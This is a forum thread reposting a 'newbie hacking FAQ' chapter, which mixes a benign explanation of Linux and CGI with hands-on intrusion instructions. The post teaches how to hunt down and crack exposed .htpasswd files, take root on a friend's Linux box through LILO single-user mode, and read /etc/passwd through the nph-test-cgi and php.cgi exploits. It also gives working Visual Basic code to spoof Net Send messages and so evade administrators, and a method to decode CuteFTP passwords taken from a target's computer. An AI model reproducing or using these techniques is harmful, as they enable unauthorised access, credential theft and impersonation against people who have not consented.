Results 1 to 4 of 4

Thread: Newbie Questions Answered - Chapter 4

  1. #1
    AntiOnline Senior Member
    Join Date
    Oct 2001
    Posts
    514

    Post Newbie Questions Answered - Chapter 4

    Here is chapter 4 of newbie questions answered -
    Same as the last 3 chapters, I didn't write this one.

    Chapter 1 -
    http://www.antionline.com/showthread...hreadid=134048

    Chapter 2 -
    http://www.antionline.com/showthread...hreadid=134563

    Chapter 3 -
    http://www.antionline.com/showthread...hreadid=134670
    --------------------------------------------------------------------------------
    Topics covered in Chapter 4

    Breaking into password protected web sites
    What is Linux?
    How can I get root access to a Linux system?
    What is CGI ?
    How to hack web sites (a couple of cgi exploits)
    An interesting little problem and solution
    How to spoof messages with Winpopup or Net Send (messenger service)
    Decrypting CuteFTP passwords

    --------------------------------------------------------------------------------

    Breaking into password protected web sites

    I am sure most of you have been to a web site where you try to access an area or page on the site and suddenly a dialog box appears asking you to enter a username and password. This is pretty common on sites which have sections that they want to keep private for one reason or another. Here is how that works:

    In the directory on the web site which is protected, there is a file almost always called .htpasswd. And in the same directory (or perhaps a different one) there is a file called .htaccess. These two files control access to the 'secure' directory that you want to access. As I mentioned, these two files are most commonly found in the same directory. The idea is that the person who owns the web site can easily stop the public from accessing a directory by simply adding those two files to it. Then, when someone tries to access the directory or a file in the directory - the server checks whether .htpasswd and .htaccess exist in the directory - and if they do, it asks for a username and password.

    The .htpasswd file stores the usernames and passwords (which are encrypted). It basically looks like a unix passwd file - only shorter. Here is an example:

    Graham:F#.DG*m38d%RF

    Webmaster:GJA54j.3g9#$@f

    Notice that the format is:

    Username:Password

    The .htaccess file includes the following information:

    So, what are you are probably wondering is "So how can I see the .htpasswd file so that I can read the usernames and passwords out of it?". Well here is the problem. Only the files inside the directory with the .htaccess file in are protected. If the .htpasswd file is in the same directory as the .htaccess then you cant view the htpasswd file without getting a correct username and password (you are basically stuffed). However, sometimes the .htpasswd file is outside of the directory (perhaps in the root directory?) so therefore it is not protected!

    So, if I found a secure web site with the following directory passworded:

    http://www.company.com/cgi-bin/protected/

    I know for a fact that there is a file in the /protected/ directory called .htaccess which is protecting it. BUT! what if the htpasswd is not in the protected directory! To find out whether it is or not - type in an url like:

    http://www.company.com/cgi-bin/protected/.htpasswd

    If you get an error saying 'File not found' or similar - then you know the file is elsewhere on the server an probably unprotected. So, we need to look around the site a bit to find out where it is - so I look at:

    http://www.company.com/.htpasswd

    http://www.company.com/cgi-bin/.htpasswd

    http://www.company.com/cgi-bin/passwords/.htpasswd

    http://www.company.com/cgi-bin/passwd/.htpasswd

    etc, etc, etc until you either give up or find the file unprotected!

    If you find the file it will look like the examples I gave above - so now you probably want to know how to decrypt the password! This is the great thing - it uses the same encryption algorithm as the unix passwd file!!!! So all you need to do is grab yourself a copy of either "John the ripper", "Crackerjack", or your favourite unix password cracker and run the file against a good wordlist.

    I found a site recently using this technique, and the htpasswd file was just in the root directory! And the guy was using his real name as a password!


    --------------------------------------------------------------------------------

    What is Linux?

    Ok, well a few people asked me this - and its a good question!

    Linux is an operating system - just like Windows or Dos. It was released at a time when an its seemed unlikely an operating system would ever overtake windows - now it is one of the fastest growing operating systems and many people are switching from Windows to Linux. Linux is a unix type operating system (see volume 1 for 'what is unix?'). Linux uses the same file and directory layout as unix (i.e. you have /etc/ and /bin/). Now, as you know - Unix is a text based operating system like Dos - therefore there are no amazing graphics. This is where people get confused with Linux! Many a time I have mentioned Linux to someone and said "Oh, I have Linux on my pc now" - only to get a response like - "What?!? Why!! Its all text isn't it and you cant get any programs for it like you can for Windows!) ... This is of course, completely wrong!

    Linux can be used exactly like Unix so that when your PC boots up you are greeted with a text prompt asking you to login, and generally its difficult to tell whether you are using Linux or Unix. The difference between Unix and Linux is simply X.

    "X" is the graphical side of Linux is called. In Linux you can choose to boot X at start-up so you never see the text Linux. Linux then boots directly into a graphical login screen (which is fully customisable - i.e. you can choose the background, the text it says, the logo it shows etc.). The reason that not many people know that Linux is in fact, graphical, is because there are so little Linux screen shots around.

    When you login to Linux via X, you will immediately find some things which are similar to windows. For a start, the icons on the desktop are on the left-hand side of the screen - like windows. Also, there is a kind of bar at the bottom which looks a tiny bit like the windows task bar. Please do not get me wrong - Linux is not a windows copy (far from it), but there are similarities in the layout. Now, in my opinion Linux looks far far prettier than windows - the graphics are stunning!

    The other great thing is that you can get windows emulators for Linux (such as the emulator "Wine"). These let you run most of your windows programs on Linux! (Even things like the game "Unreal" and Winzip !!!!). The main advantages that Linux has over any other operating system are:

    Its security (really good)
    Its speed, even on an old 486
    It performs true multi tasking
    It is unbeatable for using the advanced features of the Internet
    Its Networking facilities
    Most of the software for Linux is completely free!
    Its looks
    Its sooooo customisable
    Its open source (more on this in a min)
    Its robust (i.e. it doesn't crash all the time!)
    Core elements of the O/S can be upgraded separately for free
    Linux can handle multiple processors
    Multiple desktops (that’s right! Most Linux distributions give you 4 desktops)
    You can run it on a computer alongside windows
    Phew! Are you getting a taste for it yet? Ok, now lets go a bit more in depth into why it’s good.

    Linux is distributed as an "Open source" program. This means that the source code for it comes with it (yes, the source code for the entire operating system!! written in C). Now you may thing, "Why write something and then give the source code away so that people can copy it??" - well, Open source has turned out to be the only way to create reliable, high-quality software.

    Think about it! If you give the source code with the program, as soon as someone finds a bug - they can fix it in the code themselves (and therefore not wait for the maker to eventually get around to it). The person who fixes it can then tell other users over the net how to fix it, and therefore the problem disappears in a fraction of the time it would take Microsoft to fix it. So you see, the idea is brilliant. Also, this allows people to TRUELY customise the operating system to look and operate exactly how they want it.

    This is why you may have seen loads and loads of different companies selling Linux. Here are just a few different Linux's you can get:

    Redhat Linux
    Corel Linux
    Linux Mandrake
    Debian Linux
    SuSE Linux
    OpenLinux
    Xpresso Linux
    The list is endless. This is because Linux is completely FREE. Therefore any company can take the source code - modify it beyond belief so that it works in the way they want it to...and then distribute it as their own version. Now, I say Linux is free - well it depends how you get it. You can download any version of Linux from any companies web site for free. If you get it boxed though - you will have to pay (only about £15 / $30). You are not paying for Linux - you are paying for the manuals that you will get with it.

    Ok, so some of you might want to rush out and buy it now - I do have to warn you though - Linux is pretty difficult to install. Linux requires that you create at least two new partitions for it and that you give it quite a lot of detailed information about your hardware. Now, apparently the installations vary considerably depending on which company’s version you buy (apparently OpenLinux can be installed from within windows!). Trust me though - it is worth it.

    Some computerites will make out that you need to be a genius to install it - you don't...If I can do it - anyone can. I have RedHat Linux 6.0 running happily alongside win 95, and I didn't have any installation problems. I also got the program "Gimp" (a really amazing graphics program) and "StarOffice" (a Microsoft office style program) with it. By the way, GIMP and StarOffice are completely free as well (and they are TOP quality).

    Now away with you! Spread the word! (then read the next topic and hack all your friends!)


    --------------------------------------------------------------------------------

    How can I get root access to a Linux system?

    Heres a nice little thing that I have used. I tried this on Redhat linux 6.0 and it worked. If you are tryng this on a system run by someone who knows what their doing - then this isn't going to work because the chances are they have blocked the use of this technique, but! if you are trying this on someone who knows little about linux security - then the chances are this will get you in!

    At the lilo (linux loader) prompt type: Linux 1

    The system will boot up and you will be in a shell.

    Now type in 'passwd' and when prompted enter a new password and then re-type it to confirm. You can now reboot the system and login as 'root' with the password you choose!

    There you go! simple eh? Do it when a friend is out of the room and they wont have a clue how you did it! If anyone is actually interested in how to stop this method from working on your linux box then please email me and request me to cover it (or fill in the online hack faq question form at http://www.wangproducts.co.uk)


    --------------------------------------------------------------------------------

    What is CGI ?

    CGI stands for Common Gateway Interface. Most web sites on the Internet use cgi programs (called cgi scipts) to perform useful functions 24 hours a day. CGI scripts are essentially programs which are written and then uploaded to a web site. CGI scripts can be written in a variety of different langauges, the most popular being:

    Perl
    C / C++
    VBscript
    Perl is the most commonly used of the above. Not all servers support all the languages above, it may be that a server only lets you use Perl scripts or only VBscripts.

    Usually, cgi scripts are kept in a directory on the web site called /cgi-bin/ - it is not uncommon to be taken to a web site where the address is something like:

    http://www.company.com/cgi-bin/login.cgi

    CGI scripts are used because they allow your web pages to call programs which can run 24 hours a day (unless the damn site goes down). The uses of CGI scripts include:

    Creating visitor counters
    Allowing visitors to fill in forms on the web site and send them
    Creating guest books
    Managing username and password access
    Managing mailing lists
    Providing web email services
    Providing random messages/links
    Allowing people to upload files to your web site
    Counting file downloads
    Retrieving information about the visitors
    Password protecting certain aspects of the web site
    Providing detailed error messages
    The list is endless. This is why cgi scripts are so good - because they can be customised to serve any task you want. CGI scripts do not need to be compiled like normal programming langauges - you can even write a quick script in notepad and then upload it to your site.


    --------------------------------------------------------------------------------

    How to hack web sites (a couple of cgi exploits)

    We will be looking at a couple of cgi exploits that may allow you to gain access to a web site or server. The first is the nph-test-cgi exploit.

    This exploit can be used to display information about a web site/server if you know how to use it properly! Here is what you do:

    1) Type the url into your web browser.

    2) Add this to the end: /cgi-bin/nph-test-cgi

    3) The address should not look something like: http://www.servername.com/cgi-bin/nph-test-cgi

    3) See if you get an information screen like this appear:

    4) If you do, then you can use this information to learn more about the web site - and do a bit more. If you get an error message of some sort then sorry, the exploit isn't available on this site.

    5) Now we can exploit this server some more and see exactly whats in every directory on the system! You do this by using this syntax: /cgi-bin/nph-test-cgi?<directory>/*

    6) So, if you wanted to see what was in the 'etc' directory (where the password file is) you could type in something like this: http://www.servername.com/cgi-bin/nph-test-cgi?/etc/*

    7) If you want to look inside the root directory then type:

    http://www.servername.com/cgi-bin/nph-test-cgi?/*

    Now onto the next exploit!

    The next expoit is one which will actually allow you to view any file on the server! Heres what you do:

    1) Type the url into your web browser.

    2) Add this to it: /cgi-bin/php.cgi?<a filename>

    3) So for example, to get the password file from www.servername.com you would type this:

    http://www.servername.com/cgi-bin/php.cgi?/etc/passwd

    4)Then as long as the password file isn't shadowed (see previous hack faq volumes) you will be able to run the password file through a cracker and get access to the whole server.

    Finding a system with both these exploits on can be done which effectively gives you access to the whole system! Use this wisely!


    --------------------------------------------------------------------------------

    An interesting little problem and solution

    First of all, I am only covering the topic because it is something I have been seeing a lot of lately - and frankly its great and easy to do! Now, this relates to programs that have pre-assigned passwords in them. By this I mean that the creator of the program has actually specified a password within the programs code which can not be changed. Why would they do this? Well, this mostly relates to amateur programmers or people who have written programs for use only by themselves. It also relates to people who have made programs which allow you to put your own password on them. Sometimes the maker of the program will put his own 'backdoor' password in which allows him to get access to anyones copy of the program.

    But first, you may be thinking "Why the hell is he telling us this! I don't want to break into crappy programs!" - well thats what I thought! - until the other day. I was messing around with a trojan program on my computer and I deliberately infected myself to see what it was like - thinking I would easily be able to remove it. It turning out this trojan was really clever. Basically (practically) the only way to remove it was by actually telneting to yourself and giving the command 'removetrojan' which was meant to get rid of all traces of it off of your computer. The only problem was - when I telneted to myself, this came up:

    XXX Trojan Server

    Password :

    agh! I thought, obviously the trojan had automatically passworded itself. I calmed down and thought carefully about the situation. I had an idea! If it had automatically passworded itself, then the password must have been specified somewhere in the code by the creator. I decided to take a crafty look at the exe file with a hex editor. You can get a hex editor off the internet for free off most sites (do a search for 'hex editor'). Basically a hex editor shows you the working of the file.

    I loaded my hex editor and got it to look at the trojan.exe file. Then I did a text search for the phrase 'Password' (exactly what the program greeted me with when it asked for the access password). I found one piece of text which said Password - but after it was just a load of rubbish. I choose 'Search again' - this time something interesting came up:

    Password :Ävz*ô_€

    yô_*hahaha112233

    Access DeniedP¢B

    "Hey!" I thought. That 'Password :' is exactly the password prompt - and look what its followed by (ignore the rubbish, you always get rubbish in the files) 'hahaha112233'. The next readable bit is 'Acesss Denied' - which is what the trojan says if you get the wrong password! - this verified to me that was in the right place in the exe file. I telneted to myself again and typed the password in as 'hahaha112233'. Bingo! I was in the server and I was able to remove the trojan.

    So the point is - if the programmer specifies a password in the code when he writes it, most of the time you will able to hex edit the file and find the password in plaintext ! This is something which you should avoid in your own programs - but hey! next time you get stumped for a password to a program, try this technique. Also, try it on your friends programs!


    --------------------------------------------------------------------------------

    How to spoof messages with Winpopup or Net Send (messenger service)

    If you have access to a Local area network at your place of work or college/school that uses Windows 95/98 computers then the chances are you have winpopup on your network. If your network uses Windows NT computers then you probably have the equivalent program - Net Send or Messenger Service.

    Winpopup and Net Send are both messaging services for networks. The idea is that your meant to be able to enter someones login name or computer name and then (as long as they have the program open as well) send them a short message which will appear on their screen. Basically, its just a laugh to send stupid messages backwards and fowards to your friends.

    When a message arrives, your computer name is shown as the sender. Now, if your sending messages about hacking or other dangerous subjects the chances are that your network administrator is going to see and watch you closely. So, we want to know how to spoof a message so that it appears to be from someone else or someone who doesn't exist. Both Winpopup.exe (usually located in the c:\windows directory) and Net Send (not sure where this one is on NT - look for yourself. Apparently you use the command 'NET SEND computername message'.) use the same protocol - 'Mailslots'.

    Here is the visual basic source code to spoof a message. You will need to create a form (called Form1) with the following:

    Text box called "Text1"
    Text box called "Text2"
    Text box called "Text3"
    Command Button called "Command1"
    Then under the code for form1 - paste the following in:

    Const MAILSLOT_WAIT_FOREVER = (-1)
    Const OPEN_EXISTING = 3
    Const GENERIC_READ = &H80000000
    Const GENERIC_WRITE = &H40000000
    Const GENERIC_EXECUTE = &H20000000
    Const GENERIC_ALL = &H10000000
    Const INVALID_HANDLE_VALUE = -1
    Const FILE_SHARE_READ = &H1
    Const FILE_SHARE_WRITE = &H2
    Const FILE_ATTRIBUTE_NORMAL = &H80
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As Long
    Private Declare Function WriteFile Lib "kernel32" (ByVal hFileName As Long, ByVal lpBuff As Any, ByVal nNrBytesToWrite As Long, lpNrOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long
    Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwAccess As Long, ByVal dwShare As Long, ByVal lpSecurityAttrib As Long, ByVal dwCreationDisp As Long, ByVal dwAttributes As Long, ByVal hTemplateFile As Long) As Long

    Private Sub Command1_Click()
    cake = SendMsg(Text1.Text, Text2.Text, Text3.Text)
    End Sub

    Function SendMsg(From1 As String, To2 As String, Text3 As String) As Long
    Dim rc As Long
    Dim mshandle As Long
    Dim msgtxt As String
    Dim byteswritten As Long
    Dim mailslotname As String
    ' name of the mailslot
    mailslotname = "\\" + To2 + "\mailslot\messngr"
    msgtxt = From1 + Chr(0) + To2 + Chr(0) + Text3 + Chr(0)
    mshandle = CreateFile(mailslotname, GENERIC_WRITE, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, -1)
    rc = WriteFile(mshandle, msgtxt, Len(msgtxt), byteswritten, 0)
    rc = CloseHandle(mshandle)
    End Function


    '----------------------------- END OF CODE -------------------------------------

    Now, to use this program:

    Compile it to a .exe
    Run it
    In "text1" enter who you want the message to appear to be from (whatever you want).
    In "text2" enter who the message is to (either their login name or their computer name).
    In "text3" enter your message.
    Press the command button to send your message!
    Im sure you can think of your own uses for this program!


    --------------------------------------------------------------------------------

    Decrypting CuteFTP passwords

    CuteFTP is a popular FTP (File transfer protocol) program. FTP servers are what people use to upload and download files from servers. The most popular use of FTP is for uploading files to a web site. If your web space supports ftp transfers then you can use a free program like CuteFTP to manage your web site from within windows.

    CuteFTP has the feature of a 'site manager'. The manager allows you to enter all the details needed to connect to your FTP servers so that you can quickly connect to them by just clicking its name. The best feature of this is that it also stores your username and password so that you do not need to enter it every time you connect. Once you enter all the details for your servers, the information is placed in a file in the CuteFTP directory called "SmData.dat".

    All your servers connection information is kept in this file - along with your username and password. The username is stored in plaintext and the password is encrypted using a simple character substitution. Therefore, it is easy for a hacker to get hold of the SmData.dat file and then decrypt the passwords. This leaves the hacker with full access to all the victims servers (which are likely to be his web sites).

    The reason I am explaining this to you is so you know what to look for if you gain access to your targets computer via whatever techniques you use (physical access, trojans, system vulnerabilities etc.). The Smdata.dat file is a very small file, but if you have it you will gain a lot of information.

    Here is how the encryption scheme of the Smdata.dat file works, and how to decrypt it:

    Open up the Smdata.dat file in a text editor. Near the end of the file, the user records are stored.

    The following is an example of such records taken from an Smdata.dat:

    $^?^DWebsite.ftp.mywebsite.com^Dwebmaster^H©?«^?^?^??º ^B ^? ^U ^B ^?^?^?^?^B ^B ^B ^B ^B ^A

    ^B $^?^DWork.www.mywork.com^Danonymous^H¸©»»¿§?¬^Yinnitial remote directory^Qinitial

    directory comments^B ^? ! ?^Cd ªzY^A^B ^B ^B ^B ^B ^Vlocal directory filter^[

    remotee directory filteeeer^A

    ^B

    The $ sign at the beginning means the start of a new record, and this is followed by a number of fields which are delimited by a different ASCII character each time. The records use the following format:

    $^?^Drecord name.ip address^Dusername^Hencrypted password^B ^?

    So this means that the first record in the example above contains this information:

    RECORD NAME = Website

    IP ADDRESS = ftp.mywebsite.com

    USERNAME = webmaster

    PASSWORD = ©?«^?^?^??&#ordm;

    Notice that the fields after this are left blank. This makes CuteFTP use its default values. Now to decrypt the password.

    The example above used the password "abcABC>?". From this you can see that a=© b=? etc. etc. So, now we know that it simply uses the character replacement scheme - we need to find out what every single letter and number is replaced with (so we can build a decryption table, or write a program to do the decryption work for us). Therefore we need to encrypt the following string with CuteFTP:

    ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()`~-=\[]';,./_+|{}:"<>?

    Now if you look in the Smdata.dat file and see the encrypted version of the above string - you will have all the information you need to decrypt anyones Smdata.dat !
    [shadow]uraloony, Founder of Loony Services[/shadow]
    Visit us at
    [gloworange]http://www.loonyservices.com/[/gloworange]

  2. #2
    Senior Member
    Join Date
    Oct 2001
    Posts
    232

    Very Informative

    The article that you wrote is very interesting... as well as informative. I especially liked the part of where you put some detail into Linux and why it is a good OS.

    I give your article out of five!

    :enclosed Is My Registered Linux User Badge:
    Welcome to Hell , where we have served more than all of the fast food chains put together! And the number grows everyday! Stay tuned!

  3. #3

    Cool

    Its rally good stuff..

    Be Cool ..


  4. #4
    Very informative!! I have been using linux for about a year and a half now. I have setup my own web server, dns server, mysql server, etc..I wanted to know more. This is definetly a step in the right direction and a good source of info for use newbies.
    Bolt actions speak louder than words.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •